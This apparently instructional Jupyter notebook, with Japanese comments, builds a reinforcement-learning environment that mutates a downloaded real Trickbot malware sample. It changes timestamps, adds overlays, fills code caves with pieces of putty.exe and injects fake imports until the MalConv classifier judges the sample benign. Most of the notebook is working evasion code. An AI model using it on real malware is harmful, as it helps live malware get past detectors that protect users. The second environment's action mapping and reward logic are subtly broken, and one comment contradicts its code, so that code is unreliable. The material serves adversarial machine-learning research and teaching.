In [ ]:
!wget https://github.com/endgameinc/malware_evasion_competition/blob/master/models/malconv/malconv.checkpoint?raw=true -O malconv.checkpoint

In [ ]:
#　サンプルファイルのダウンロード
!wget https://github.com/InQuest/malware-samples/blob/master/2019-02-Trickbot/374ef83de2b254c4970b830bb93a1dd79955945d24b824a0b35636e14355fe05?raw=true -O sample.bin
!wget https://the.earth.li/~sgtatham/putty/latest/w32/putty.exe -O putty.exe

In [ ]:
!pip install lief==0.10.0 # liefの最新版だと、Colabがクラッシュすることがあるので 0.10.0を使用する
!pip install pefile

In [ ]:
import torch
import torch.nn as nn
import torch.nn.functional as F
import numpy as np

# PyTorchでは、torch.nn.Moduleクラスを継承して独自のネットワークを作成する
class MalConv(nn.Module):
    # ニューラルネットワークの層を定義する
    def __init__(self, out_size=2, channels=128, window_size=512, embd_size=8):
        # nn.Module内の初期化関数を実行する        
        super(MalConv, self).__init__()

        # 埋め込み層。各入力バイトを8次元ベクトルにマッピングする
        self.embd = nn.Embedding(257, embd_size, padding_idx=0)
        
        # 一次元の畳み込み層2つ
        self.window_size = window_size
        self.conv_1 = nn.Conv1d(embd_size, channels, window_size, stride=window_size, bias=True)
        self.conv_2 = nn.Conv1d(embd_size, channels, window_size, stride=window_size, bias=True)
        
        # プーリング層
        self.pooling = nn.AdaptiveMaxPool1d(1)
        
        # 全結合層2つ
        self.fc_1 = nn.Linear(channels, channels)
        self.fc_2 = nn.Linear(channels, out_size)
    
    # 層間の計算を定義する
    def forward(self, x):
        # 入力を埋め込み層に与えた結果を得る
        x = self.embd(x.long())
        x = torch.transpose(x,-1,-2) # 行列の転置
        
        # 畳み込み層1の結果を得る
        cnn_value = self.conv_1(x)

        # 畳み込み層2の結果を取得し、シグモイド関数に掛ける
        gating_weight = torch.sigmoid(self.conv_2(x))

        # 積をとる
        x = cnn_value * gating_weight
        
        # プーリング層の結果を得る
        x = self.pooling(x)
        
        x = x.view(x.size(0), -1) # 平滑化
        
        # 全結合層1の結果をReLU関数に掛ける
        x = F.relu(self.fc_1(x))

        # 全結合層2の結果を得る
        x = self.fc_2(x)
        
        return x

In [ ]:
MALCONV_MODEL_PATH = 'malconv.checkpoint'

class MalConvModel(object):
    def __init__(self, model_path, thresh=0.5, name='malconv'): 
        # MalConvのロード
        self.model = MalConv(channels=256, window_size=512, embd_size=8).train()
        # 学習済のモデルをロードする
        weights = torch.load(model_path,map_location='cpu')
        self.model.load_state_dict(weights['model_state_dict'])
        self.thresh = thresh
        self.__name__ = name

    def predict(self, bytez):
        # ファイルのバイト列を整数（0～255）に変換する
        _inp = torch.from_numpy(np.frombuffer(bytez,dtype=np.uint8)[np.newaxis,:])
        # MalConvの結果をソフトマックス関数に掛け、マルウェアらしさの確率を出力する
        with torch.no_grad():
            outputs = F.softmax(self.model(_inp), dim=-1)

        # マルウェアらしさが閾値0.5を越えていたらマルウェアと判定する
        return outputs.detach().numpy()[0,1] > self.thresh
    
    def predict_with_score(self, bytez):
        # ファイルのバイト列を整数（0～255）に変換する
        _inp = torch.from_numpy(np.frombuffer(bytez,dtype=np.uint8)[np.newaxis,:])
        # MalConvの結果をソフトマックス関数に掛け、マルウェアらしさの確率を出力する
        with torch.no_grad():
            outputs = F.softmax(self.model(_inp), dim=-1)

        # スコアを直接返す
        return outputs.detach().numpy()[0,1]

In [ ]:
with open('sample.bin', 'rb') as f:
    bytez = f.read()

# MalConvModelを用いて分類する
malconv = MalConvModel(MALCONV_MODEL_PATH, thresh=0.5)
print(f'{malconv.__name__}:  {malconv.predict_with_score(bytez)}')

In [ ]:
with open('putty.exe', 'rb') as f:
    bytez2 = f.read()

print(malconv.predict_with_score(bytez2))

In [ ]:
# オリジナルのgym-malwareのリポジトリから頻出DLL・APIが記録された辞書ファイルを取得する
!wget https://raw.githubusercontent.com/endgameinc/gym-malware/master/gym_malware/envs/controls/small_dll_imports.json -O common_imports.json  

# セクションフラグ
IMAGE_SCN_TYPE_REG                  = 0x00000000
IMAGE_SCN_TYPE_DSECT                = 0x00000001
IMAGE_SCN_TYPE_NOLOAD               = 0x00000002
IMAGE_SCN_TYPE_GROUP                = 0x00000004
IMAGE_SCN_TYPE_NO_PAD               = 0x00000008
IMAGE_SCN_TYPE_COPY                 = 0x00000010
IMAGE_SCN_CNT_CODE                  = 0x00000020
IMAGE_SCN_CNT_INITIALIZED_DATA      = 0x00000040
IMAGE_SCN_CNT_UNINITIALIZED_DATA    = 0x00000080
IMAGE_SCN_LNK_OTHER                 = 0x00000100
IMAGE_SCN_LNK_INFO                  = 0x00000200
IMAGE_SCN_LNK_OVER                  = 0x00000400
IMAGE_SCN_LNK_REMOVE                = 0x00000800
IMAGE_SCN_LNK_COMDAT                = 0x00001000
IMAGE_SCN_MEM_PROTECTED             = 0x00004000
IMAGE_SCN_NO_DEFER_SPEC_EXC         = 0x00004000
IMAGE_SCN_GPREL                     = 0x00008000
IMAGE_SCN_MEM_FARDATA               = 0x00008000
IMAGE_SCN_MEM_SYSHEAP               = 0x00010000
IMAGE_SCN_MEM_PURGEABLE             = 0x00020000
IMAGE_SCN_MEM_16BIT                 = 0x00020000
IMAGE_SCN_MEM_LOCKED                = 0x00040000
IMAGE_SCN_MEM_PRELOAD               = 0x00080000
IMAGE_SCN_ALIGN_1BYTES              = 0x00100000
IMAGE_SCN_ALIGN_2BYTES              = 0x00200000
IMAGE_SCN_ALIGN_4BYTES              = 0x00300000
IMAGE_SCN_ALIGN_8BYTES              = 0x00400000
IMAGE_SCN_ALIGN_16BYTES             = 0x00500000
IMAGE_SCN_ALIGN_32BYTES             = 0x00600000
IMAGE_SCN_ALIGN_64BYTES             = 0x00700000
IMAGE_SCN_ALIGN_128BYTES            = 0x00800000
IMAGE_SCN_ALIGN_256BYTES            = 0x00900000
IMAGE_SCN_ALIGN_512BYTES            = 0x00A00000
IMAGE_SCN_ALIGN_1024BYTES           = 0x00B00000
IMAGE_SCN_ALIGN_2048BYTES           = 0x00C00000
IMAGE_SCN_ALIGN_4096BYTES           = 0x00D00000
IMAGE_SCN_ALIGN_8192BYTES           = 0x00E00000
IMAGE_SCN_ALIGN_MASK                = 0x00F00000
IMAGE_SCN_LNK_NRELOC_OVFL           = 0x01000000
IMAGE_SCN_MEM_DISCARDABLE           = 0x02000000
IMAGE_SCN_MEM_NOT_CACHED            = 0x04000000
IMAGE_SCN_MEM_NOT_PAGED             = 0x08000000
IMAGE_SCN_MEM_SHARED                = 0x10000000
IMAGE_SCN_MEM_EXECUTE               = 0x20000000
IMAGE_SCN_MEM_READ                  = 0x40000000
IMAGE_SCN_MEM_WRITE                 = 0x80000000


ZERO_CHAR = b'\x00'

In [ ]:
from pefile import *
from datetime import datetime
import time
import random
import json

class PEManipulator(PE):
    def __init__(self, name=None, data=None, fast_load=None):
        super(PEManipulator, self).__init__(name, data, fast_load)
        self.code_cave_dict = {}
        self.common_imports_dict = {}
        self.target_section = None

    def reset_timestamp(self, new_timestamp_str=None):
        # 指定された日時の文字列をUNIX時間に変換する（デフォルトは1970年1月1日午前0時0分0秒）
        if new_timestamp_str == None: new_timestamp_str = datetime.now().strftime('%Y-%m-%d %H:%M:%S')
        new_timestamp = int(time.mktime(time.strptime(new_timestamp_str, '%Y-%m-%d %H:%M:%S')))
        # 当該UNIX時間でTimeStampを上書きする
        self.FILE_HEADER.TimeDateStamp = new_timestamp 
        return

    def add_overlay(self, overlay=None, upper=255):
        # 書き込むサイズを設定する
        L = 2**random.randint(5, 8)
        # 指定された文字コードとサイズの範囲でランダムなデータを生成する
        if overlay is None:
          overlay = bytes([random.randint(0, upper) for _ in range(L)])
        # ファイルの末尾にデータを追記する
        self.__data__ = (self.__data__[:-1] + overlay)
        
        return

    def find_code_cave(self, min_cave_size=100):
        # セクションごとにコードケイブを探索する
        for section in self.sections:
            code_cave_offset = 0
            code_cave_size = 0

            # セクションに含まれるデータを取得する
            data = section.get_data()

            for i, byte in enumerate(data):
                code_cave_offset += 1

                # 現在のデータが0x00ならコードケイブの候補とする
                if byte == 0x00:
                    code_cave_size += 1
                    continue

                # コードケイブの候補が一定のサイズ以上連続している場合、
                elif code_cave_size > min_cave_size:
                    # ヒューリスティック：コードケイブの候補間にわずかなデータがあればコードケイブではないと判断し、
                    # そうでなければコードケイブであると判断する
                    if i < len(data)-1 and data[i+1] == 0x00:
                        break
                    
                    # ファイル上のコードケイブの起点となるアドレスを取得し、
                    code_cave_address = section.PointerToRawData + code_cave_offset - code_cave_size - 1
                    # コードケイブの起点となるアドレスとコードケイブのサイズを辞書に記録する
                    self.code_cave_dict.update({code_cave_address: code_cave_size})

                code_cave_size = 0

        return

    def add_code_cave(self, code_cave=None, upper=255, min_cave_size=100):
        # コードケイブ辞書が空の場合、コードケイブを探索する
        if self.code_cave_dict == {}: self.find_code_cave(min_cave_size)
        try:
            # コードケイブ辞書からランダムに1件取得する
            code_cave_address, code_cave_size = random.choice(list(self.code_cave_dict.items()))
            L = code_cave_size
            # 指定された文字コードとサイズの範囲でランダムなデータを生成する
            if code_cave is None:
                code_cave = bytes([random.randint(0, upper) for _ in range(L)])
            # 起点となるアドレスからコードケイブを追記する
            self.set_bytes_at_offset(code_cave_address, code_cave)
        except: # 辞書が空の場合は何もしない
            pass

        return


    def add_fake_imports(self, entries=None, section_name=None):
        # 偽のインポート関数を追加する
        if entries == None and self.common_imports_dict == {}:
            # 頻出DLL・APIの辞書からDLLをランダムに1件、当該DLLがエクスポートしているAPIをランダムに数件取得する
            self.common_imports_dict = json.load(open('common_imports.json'))
            entries = {}
            dll = random.choice(list(self.common_imports_dict.keys()))
            while True:
                funcs = random.sample(list(self.common_imports_dict[dll]), random.randint(1, 5))
                # 適切に読み込めないAPIを除外する
                funcs = [func for func in funcs if not func.startswith('ord')]
                funcs = [func for func in funcs if not func.startswith('?')]
                if len(funcs) > 0: break

            entries.update({dll: funcs})

        # 改変したIATを書き込む新規セクションを作成する
        section = self.add_section(section_name, IMAGE_SCN_MEM_READ | IMAGE_SCN_MEM_WRITE)
        self.target_section = section
        section_offset = section.VirtualAddress

        IAT_offset = section_offset
        IAT_size = 0
        for dll, funcs in entries.items():
            if self.PE_TYPE == OPTIONAL_HEADER_MAGIC_PE:
                IAT_size += (len(funcs)+1)*0x4
            elif self.PE_TYPE == OPTIONAL_HEADER_MAGIC_PE_PLUS:
                IAT_size += (len(funcs)+1)*0x8
            else:
                IAT_size += (len(funcs)+1)*0x4

        if IAT_size % 0x10 != 0:
             IT_offset = IAT_offset + IAT_size - IAT_size % 0x10 + 0x10
        else:
             IT_offset = IAT_offset + IAT_size

        IT_size = (len(self.DIRECTORY_ENTRY_IMPORT) + len(entries)+1)*0x14

        if IT_size % 0x10 != 0:
             ILT_offset = IT_offset + IT_size - IT_size % 0x10 + 0x10
        else:
             ILT_offset = IT_offset + IT_size

        ILT_size = IAT_size

        if ILT_size % 0x10 != 0:
             DATA_offset = ILT_offset + ILT_size - ILT_size % 0x10 + 0x10
        else:
             DATA_offset = ILT_offset + ILT_size
    
        if self.PE_TYPE == OPTIONAL_HEADER_MAGIC_PE:
             THUNK_DATA_STRUCT = self.__IMAGE_THUNK_DATA_format__
        elif self.PE_TYPE == OPTIONAL_HEADER_MAGIC_PE_PLUS:
             THUNK_DATA_STRUCT = self.__IMAGE_THUNK_DATA64_format__
        else:
             THUNK_DATA_STRUCT = self.__IMAGE_THUNK_DATA_format__

        DATA = b''
        IAT_ILT = b''
        IT = b''
      
        old_IT_offset = self.get_offset_from_rva(self.OPTIONAL_HEADER.DATA_DIRECTORY[1].VirtualAddress)
        while self.OPTIONAL_HEADER.DATA_DIRECTORY[1].Size > len(IT):
            IT_entry = Structure(self.__IMAGE_IMPORT_DESCRIPTOR_format__)
            IT_entry_data = self.__data__[old_IT_offset:old_IT_offset+IT_entry.sizeof()]
            IT_entry.__unpack__(IT_entry_data)

            if IT_entry.all_zeroes():
                break
            else:
                old_IT_offset += IT_entry.sizeof()
                IT += IT_entry_data

        for dll, funcs in entries.items():
            IT_entry = Structure(self.__IMAGE_IMPORT_DESCRIPTOR_format__)
            IT_entry.OriginalFirstThunk = ILT_offset + len(IAT_ILT)
            IT_entry.TimeDateStamp = 0
            IT_entry.ForwarderChain = 0
            IT_entry.FirstThunk = IAT_offset + len(IAT_ILT)

            for func in funcs:
                DATA_entry = b'\x00\x00'
                DATA_entry += func.encode()
                if len(func) % 2 == 1:
                     DATA_entry += ZERO_CHAR
                else:
                     DATA_entry += b'\x00\x00'

                IAT_entry = Structure(THUNK_DATA_STRUCT)
                IAT_entry.ForwarderString = DATA_offset + len(DATA)

                DATA += DATA_entry
                IAT_ILT += IAT_entry.__pack__()

            IAT_entry = Structure(THUNK_DATA_STRUCT)
            IAT_entry.ForwarderString = 0

            IAT_ILT += IAT_entry.__pack__()

            IT_entry.Name = DATA_offset + len(DATA)
            DATA += dll.encode()
            if len(dll) % 2 == 1:
                DATA += ZERO_CHAR
            else:
                DATA += b'\x00\x00'

            IT += IT_entry.__pack__()

        IT_entry = Structure(self.__IMAGE_IMPORT_DESCRIPTOR_format__)
        IT_entry.OriginalFirstThunk = 0
        IT_entry.TimeDateStamp = 0
        IT_entry.ForwarderChain = 0
        IT_entry.FirstThunk = 0
        IT_entry.Name = 0
        IT += IT_entry.__pack__()

        section_data = b''
        section_data += IAT_ILT
        section_data += ZERO_CHAR*(IT_offset-IAT_offset-len(IAT_ILT))
        section_data += IT
        section_data += ZERO_CHAR*(ILT_offset-IT_offset-len(IT))
        section_data += IAT_ILT
        section_data += ZERO_CHAR*(DATA_offset-ILT_offset-len(IAT_ILT))
        section_data += DATA

        self.set_data(section_data)

        self.OPTIONAL_HEADER.DATA_DIRECTORY[1].VirtualAddress = IT_offset
        self.OPTIONAL_HEADER.DATA_DIRECTORY[1].Size = len(IT)

        self.DIRECTORY_ENTRY_IMPORT = self.parse_import_directory(IT_offset, len(IT))

        return section

    def add_section(self, name, characteristics, data=None):
    # 新しいセクションを追加する
        if name == None:
            name = '.' + ''.join(map(chr, [random.randint(0, 126) for _ in range(random.randint(1, 6))]))

        if type(name) == str:
            name = name.encode()
        if data != None and type(data) == str:
            data = data.encode()

        if self.FILE_HEADER.NumberOfSections == len(self.sections):
            FileAlignment = self.OPTIONAL_HEADER.FileAlignment
            SectionAlignment = self.OPTIONAL_HEADER.SectionAlignment

            if not data:
                VirtualSize = 0
                data = ZERO_CHAR*FileAlignment
            else:
                VirtualSize = len(data)
                data += ZERO_CHAR*(FileAlignment-len(data)%FileAlignment)

            if len(name) > 8:
                raise Exception('Error : Name is too long for a section')

            if(self.sections[-1].Misc_VirtualSize == 0):
                VirtualAddress = self.sections[-1].VirtualAddress + SectionAlignment
            else:
                VirtualAddress = self.sections[-1].VirtualAddress + self.sections[-1].Misc_VirtualSize
            if (self.sections[-1].Misc_VirtualSize % SectionAlignment) != 0:
                VirtualAddress = (self.sections[-1].VirtualAddress + self.sections[-1].Misc_VirtualSize -
                                 (self.sections[-1].Misc_VirtualSize % SectionAlignment) + SectionAlignment)

            RawSize = len(data)
            RawAddress = self.sections[-1].PointerToRawData + self.sections[-1].SizeOfRawData
            self.__data__ = self.__data__[:RawAddress] + data + self.__data__[RawAddress:]
            self.__addSectionHeader(name, VirtualSize, VirtualAddress, RawSize, RawAddress, characteristics)
            self.adjust_optional_header()

        else:
            raise Exception('Error in PE File : invalid number of sections')
        return self.sections[-1]

    def __addSectionHeader(self, name, VirtualSize, VirtualAddress, RawSize, RawAddress, characteristics):
    # セクションヘッダを追加する
    # add_sectionのヘルパーとして動作する
        file_header_offset = self.DOS_HEADER.e_lfanew + 4
        section_table_offset = (file_header_offset + self.FILE_HEADER.sizeof() + self.FILE_HEADER.SizeOfOptionalHeader)
        new_section_offset = section_table_offset + self.FILE_HEADER.NumberOfSections*0x28

        if new_section_offset + 0x28 < self.OPTIONAL_HEADER.SizeOfHeaders:
            self.set_bytes_at_offset(new_section_offset, name)
            self.set_dword_at_offset(new_section_offset+0x08, VirtualSize)
            self.set_dword_at_offset(new_section_offset+0x0C, VirtualAddress)
            self.set_dword_at_offset(new_section_offset+0x10, RawSize)
            self.set_dword_at_offset(new_section_offset+0x14, RawAddress)
            self.set_dword_at_offset(new_section_offset+0x18, 0x0)
            self.set_dword_at_offset(new_section_offset+0x1C, 0x0)
            self.set_word_at_offset(new_section_offset+0x20, 0x0)
            self.set_word_at_offset(new_section_offset+0x22, 0x0)
            self.set_dword_at_offset(new_section_offset+0x24, characteristics)

            self.FILE_HEADER.NumberOfSections += 1

            section = SectionStructure( self.__IMAGE_SECTION_HEADER_format__, pe=self )
            section.set_file_offset(new_section_offset)
            section_data = self.__data__[new_section_offset : new_section_offset + section.sizeof()]
            section.__unpack__(section_data)

            section.next_section_virtual_address = None
            self.sections[-1].next_section_virtual_address = VirtualAddress

            self.__structures__.append(section)

            section_flags = retrieve_flags(SECTION_CHARACTERISTICS, 'IMAGE_SCN_')

            set_flags(section, section.Characteristics, section_flags)

            self.sections.append(section)
        else:
            raise NotImplementedError('Increase SizeOfheaders size')

    def adjust_optional_header(self):
    # 追記したデータぶんオプショナルヘッダの各値を調整する
        self.OPTIONAL_HEADER.SizeOfImage = (self.sections[-1].VirtualAddress +
                                            self.sections[-1].Misc_VirtualSize)

        self.OPTIONAL_HEADER.SizeOfCode = 0
        self.OPTIONAL_HEADER.SizeOfInitializedData = 0
        self.OPTIONAL_HEADER.SizeOfUninitializedData = 0

        for section in self.sections:
            if section.Characteristics & IMAGE_SCN_CNT_CODE:
                self.OPTIONAL_HEADER.SizeOfCode += section.SizeOfRawData
            if section.Characteristics & IMAGE_SCN_CNT_INITIALIZED_DATA:
                self.OPTIONAL_HEADER.SizeOfInitializedData += section.SizeOfRawData
            if section.Characteristics & IMAGE_SCN_CNT_UNINITIALIZED_DATA:
                self.OPTIONAL_HEADER.SizeOfUninitializedData += section.SizeOfRawData


    def set_data(self, data):
    # 与えられたデータをセクションに書き込む
        self.set_raw_data_size(len(data))
        self.__data__ = (self.__data__[:self.target_section.PointerToRawData] +
                          data +
                          self.__data__[self.target_section.PointerToRawData+len(data):])

        section_index = None
        for index, section in enumerate(self.sections):
            if section.VirtualAddress == self.target_section.VirtualAddress:
                section_index = index
                break
        if not section_index:
            raise Exception('Unable to find the right section')

        section_table_offset = (self.DOS_HEADER.e_lfanew + 4 + self.FILE_HEADER.sizeof() +
                                self.FILE_HEADER.SizeOfOptionalHeader)
        section_offset = section_table_offset + section_index*0x28

        self.target_section.Misc_VirtualSize = len(data)
        self.adjust_optional_header()

    def set_raw_data_size(self, size):
    # SizeOfRawDataを新たなセクションのサイズで更新する
        FileAlignment = self.OPTIONAL_HEADER.FileAlignment
        if size % FileAlignment != 0:
            size = size - size % FileAlignment + FileAlignment

        old_section_size = self.target_section.SizeOfRawData
        new_section_size = size

        max_size = self.get_max_raw_data_size()

        if max_size and new_section_size > max_size:
            raise PEFormatError('Impossible to increase size')

        if old_section_size >= new_section_size:
            return

        data = ZERO_CHAR * (new_section_size - old_section_size)
        self.__data__ = (self.__data__[:self.target_section.PointerToRawData + self.target_section.SizeOfRawData] +
                          data +
                          self.__data__[self.target_section.PointerToRawData + self.target_section.SizeOfRawData:])

        section_index = None
        for index, section in enumerate(self.sections):
            if section.VirtualAddress == self.target_section.VirtualAddress:
                section_index = index
                break

        if not section_index:
            raise Exception('Unable to find the right section')

        section_table_offset = (self.DOS_HEADER.e_lfanew + 4 + self.FILE_HEADER.sizeof() +
                              self.FILE_HEADER.SizeOfOptionalHeader)
        section_offset = section_table_offset + section_index*0x28

        self.SizeOfRawData = new_section_size

        for index, section in enumerate(self.sections):
            if section.PointerToRawData > self.target_section.PointerToRawData:
                section.PointerToRawData += len(data)

    def get_max_raw_data_size(self):

    # 書き込み可能なデータのサイズを取得する
        next_section = None
        for section in self.sections:
            if section.VirtualAddress > self.target_section.VirtualAddress:
                if not next_section:
                    next_section = section
                    continue

                if section.VirtualAddress < next_section.VirtualAddress:
                    next_section = section
        if not next_section:
            return None
        else:
            return next_section.VirtualAddress - self.target_section.VirtualAddress

In [ ]:
pe = PEManipulator('sample.bin')
pe.reset_timestamp(new_timestamp_str='2020-01-01 00:00:00')
pe.write('sample_modified.bin')

In [ ]:
!pip install keras-rl2
!apt-get -qq -y install xvfb > /dev/null
!pip -q install gym
!pip -q install pyglet
!pip -q install pyopengl
!pip -q install pyvirtualdisplay

In [ ]:
# Google Colabでの描画用設定
from pyvirtualdisplay import Display
display = Display(visible=0, size=(400, 300))
display.start()

In [ ]:
# OpenAI Gymをインポートする
import gym

# KerasおよびKeras-RLをインポートする
from tensorflow.keras.models import Sequential
from tensorflow.keras.layers import Dense, Activation, Flatten
from tensorflow.keras.optimizers import Adam
from rl.agents.dqn import DQNAgent
from rl.policy import EpsGreedyQPolicy
from rl.memory import SequentialMemory

# 一部環境でのエラー抑制用イディオム
import tensorflow as tf
tf.compat.v1.disable_eager_execution()

# 強化学習タスクの環境を初期化する
ENV_NAME = 'CartPole-v0'
env = gym.make(ENV_NAME)
nb_actions = env.action_space.n

# Q関数の近似に用いるニューラルネットワークを定義する
# 状態空間の次元env.observation_space.shapeを入力、
# 行動空間の次元nb_actionsを出力としていれば、中間層は好きに積み重ねてよい
model = Sequential()
model.add(Flatten(input_shape=(1,) + env.observation_space.shape))
model.add(Dense(16))
model.add(Activation('relu'))
model.add(Dense(16))
model.add(Activation('relu'))
model.add(Dense(16))
model.add(Activation('relu'))
model.add(Dense(nb_actions))
model.add(Activation('linear'))

# Experience Replay用のメモリを用意する
memory = SequentialMemory(limit=50000, window_length=1)

# 行動ポリシーとして確率1-epsでランダムな行動をとらせるようにする
policy = EpsGreedyQPolicy(eps=.1)

# エージェントを初期化する
# DQNAgentの引数にはさきほど定義したネットワーク、行動空間の次元数、
# Exprerience Replay用のメモリ、割引率、Target Q-Networkのアップデート頻度、
# 行動ポリシーなどを指定する
dqn = DQNAgent(model=model, nb_actions=nb_actions, gamma=0.99, memory=memory, nb_steps_warmup=100,target_model_update=1e-2, policy=policy)
dqn.compile(Adam(learning_rate=1e-3), metrics=['mse'])

# エージェントを学習させる
# ここでは100,000回の行動を通じてQ関数を近似している
history = dqn.fit(env=env, nb_steps=100000, visualize=True, verbose=2)

# ニューラルネットワークの重みを保存する
dqn.save_weights('dqn_{}_weights.h5f'.format(ENV_NAME), overwrite=True)

# 学習済のエージェントをテストする
# ここでは5回のエピソードにわたってエージェントをテストしている
dqn.test(env=env, nb_episodes=5, visualize=True)

# 学習過程をプロットするためにmatplotlibをインポートする
%matplotlib inline
import matplotlib.pyplot as plt

# 学習過程の履歴を取得する
nb_episode_steps = history.history['nb_episode_steps']
episode_reward = history.history['episode_reward']

# 取得した学習過程をプロットする
plt.subplot(2,1,1)
plt.plot(nb_episode_steps)
plt.ylabel('step')

plt.subplot(2,1,2)
plt.plot(episode_reward)
plt.xlabel('episode')
plt.ylabel('reward')

plt.show()

In [ ]:
!pip install git+https://github.com/elastic/ember.git

In [ ]:
import numpy as np
import gym
import gym.spaces
from ember import PEFeatureExtractor

class MalwareEvasionEnv(gym.Env):
    def __init__(self):
        super().__init__()
        # 行動空間を定義する（必須）
        # ここではreset_timestamp, add_overlay,
        # add_code_cave, そしてadd_fake_importsの4つ 
        self.action_space = gym.spaces.Discrete(4)
        # 報酬の最小値と最大値を定義する（必須）
        self.reward_range = [-1., 100.]
        # 環境を初期化する（必須）
        self.reset()

    # 環境を初期化する（必須）
    # 戻り値は初期状態
    def reset(self):
        # マルウェアのバイト列を読み取り、
        with open('sample.bin', 'rb') as f:
            malware_bytez = f.read()        
        self.bytez = malware_bytez
        # 4章で用いたEMBERの特徴抽出器を使って状態を生成する
        # この特徴抽出の内部ではLIEFが用いられているが、
        # pefileでも同様の処理は可能である
        self.extractor = PEFeatureExtractor(2)
        self.observation_space = np.array( \
            self.extractor.feature_vector(self.bytez), \
                dtype=np.float32)
        # 分類器を初期化する
        self.model = MalConvModel(MALCONV_MODEL_PATH, thresh=0.5)
        return self.observation_space

    # 行動を実行する（必須）
    # 戻り値は次状態、報酬、エピソード終了フラグ、追加情報 
    def step(self, action):
        # エージェントが0, 1, 2, 3のどれかをactionとして渡してくるので、
        # 愚直にPEManipulatorのメソッドと対応づけて実行する
        pe = PEManipulator(data=self.bytez)
        if action == 0:
            pe.reset_timestamp()
        if action == 1:
            pe.add_overlay()
        if action == 2:
            pe.add_code_cave()
        if action == 3:
            pe.add_fake_imports()
        
        # 状態を更新する
        self.bytez = pe.write()
        self.observation_space = np.array( \
            self.extractor.feature_vector(self.bytez), \
                dtype=np.float32)
        
        # 報酬を取得する
        # ここではMalConvがマルウェアだと判定すると-1、
        # MalConvが良性ファイルだと判定すると100の報酬を与える
        reward = -1 if self.model.predict(self.bytez) else 100
        
        # 報酬をもとにエピソード終了フラグを更新する
        episode_over = False if reward == -1 else True
        
        return self.observation_space, reward, episode_over, {}

    # 環境を可視化する（必須）
    # 中身は空でよい
    def render(self, mode='human', close=False):
        pass

    # 環境を閉じる
    # 中身は空でよい
    def _close(self):
        pass

    # シードを固定する
    # 中身は空でよい
    def _seed(self, seed=None):
        pass

In [ ]:
from gym.envs.registration import register

register(
    # IDを登録する
    # IDは<環境名>-v<バージョン番号>というフォーマットに沿って記述する
    id='MalwareEvasionEnv-v0',
    entry_point='__main__:MalwareEvasionEnv'
    # エントリポイントを定義する
    # エントリポイントは<名前空間>:<クラス名>というフォーマットに沿って記述する
    # ここではJupyter NotebookまたはGoogle Colaboratoryのセル中に環境が存在することを前提としている
)

In [ ]:
class MalConvModel(object):
    def __init__(self, model_path, thresh=0.5, name='malconv'): 
    # MalConvのロード
        self.model = MalConv(channels=256, 
        window_size=512, embd_size=8).train()
    # 学習済のモデルをロードする
        weights = torch.load(model_path,map_location='cpu')
        self.model.load_state_dict(weights['model_state_dict'])
        self.thresh = thresh
        self.__name__ = name

    def predict_with_score(self, bytez):
        # ファイルのバイト列を整数（0～255）に変換する
        _inp = torch.from_numpy( \
            np.frombuffer(bytez,dtype=np.uint8)[np.newaxis,:])
        # MalConvの結果をソフトマックス関数に掛け、マルウェアらしさの確率を出力する
        with torch.no_grad():
            outputs = F.softmax(self.model(_inp), dim=-1)

        # スコアを直接返す
        return outputs.detach().numpy()[0,1]

class MalwareEvasionEnv(gym.Env):
    def __init__(self):
        super().__init__()
        # 行動空間を定義する（必須）
        # ここでは以下の13件の行動を用いる
        # - reset_timestamp(現在日時)
        # - add_overlay(ランダムに生成したデータ)
        # - add_overlay(良性ファイルのデータ片)を5通り
        # - add_code_cave(ランダムに生成したデータ)
        # - add_code_cave(良性ファイルのデータ片)を5通り
        self.action_space = gym.spaces.Discrete(13)
        # 報酬の最小値と最大値を定義する（必須）
        self.reward_range = [-1., 100.]
        # 環境を初期化する（必須）
        self.reset()

    # 環境を初期化する（必須）
    # 戻り値は初期状態
    def reset(self):        
        # マルウェアのバイト列を読み取り、
        with open('sample.bin', 'rb') as f:
            malware_bytez = f.read()
        self.bytez = malware_bytez
        # 4章で用いたEMBERの特徴抽出器を使って状態を生成する
        # この特徴抽出の内部ではLIEFが用いられているが、
        # pefileでも同様の処理は可能である
        self.extractor = PEFeatureExtractor(2)
        self.observation_space = np.array( \
            self.extractor.feature_vector(self.bytez), \
                dtype=np.float32)
        
        # 良性ファイルのバイト列を読み取り、
        with open('putty.exe', 'rb') as f:
            benign_bytez = f.read()
        # 分割したデータのリストを作成する
        num_splits = 5
        offset = int(len(benign_bytez) / num_splits)
        self.benign_bytez_list = \
            [benign_bytez[i: i+offset] \
                for i in range(0, len(benign_bytez), offset)]
        
        # 分類器を初期化する
        self.model = MalConvModel(MALCONV_MODEL_PATH, thresh=0.5)
        
        # スコアを初期化する
        self.prev_score = 1
        self.thresh = 0.5
        self.steps = 0
        self.steps_limit = 100
        
        return self.observation_space

  # 行動を実行する（必須）
    # 戻り値は次状態、報酬、エピソード終了フラグ、追加情報 
    def step(self, action):
        # エージェントが0〜12のいずれかをactionとして渡してくるので、
        # PEManipulatorのメソッドと対応づけて実行する
        pe = PEManipulator(data=self.bytez)
        if action == 0:
            pe.reset_timestamp()
        if action == 1:
            pe.add_overlay()
        # 良性ファイルの一部をオーバーレイとして追加する
        if action in range(2, 6):
            pe.add_overlay( \
                overlay=self.benign_bytez_list[action-2])
        if action == 7:
            pe.add_code_cave()
        # 良性ファイルの一部をコードケイブとして追加する
        if action in range(8, 12):
            pe.add_code_cave( \
                code_cave=self.benign_bytez_list[action-8])
        
        # 状態を更新する
        self.bytez = pe.write()
        self.observation_space = np.array( \
            self.extractor.feature_vector(self.bytez), \
                dtype=np.float32)

        # 報酬を取得する
        # ここではMalConvの悪性スコアが
        # 前回のスコアより低くなれば+1、低くならなければ-1、
        # そしてMalConvが良性ファイルだと判定すると100の報酬を与える
        # 報酬または行動回数に応じてエピソード終了フラグも更新する
        episode_over = False
        self.steps += 1

        score = self.model.predict_with_score(self.bytez)
        if score < self.prev_score:
            reward = 1
        if score < self.thresh:
            reward = 100
            episode_over = True
        else:
            reward = -1

        self.prev_score = score

        if self.steps > self.steps_limit:
            episode_over = True
        
        # 報酬をもとにエピソード終了フラグを更新する
        episode_over = False if reward == -1 else True

        return self.observation_space, reward, episode_over, {}

    # 環境を可視化する（必須）
    # 中身は空でよい
    def render(self, mode='human', close=False):
        pass

    # 環境を閉じる
    # 中身は空でよい
    def _close(self):
        pass

    # シードを固定する
    # 中身は空でよい
    def _seed(self, seed=None):
        pass

In [ ]:
from gym.envs.registration import register

register(
    # 環境のIDを登録する
    # IDは<環境名>-v<バージョン番号>というフォーマットに沿って記述する
    id='MalwareEvasionEnv-v1',
    entry_point='__main__:MalwareEvasionEnv'
    # エントリポイントを定義する
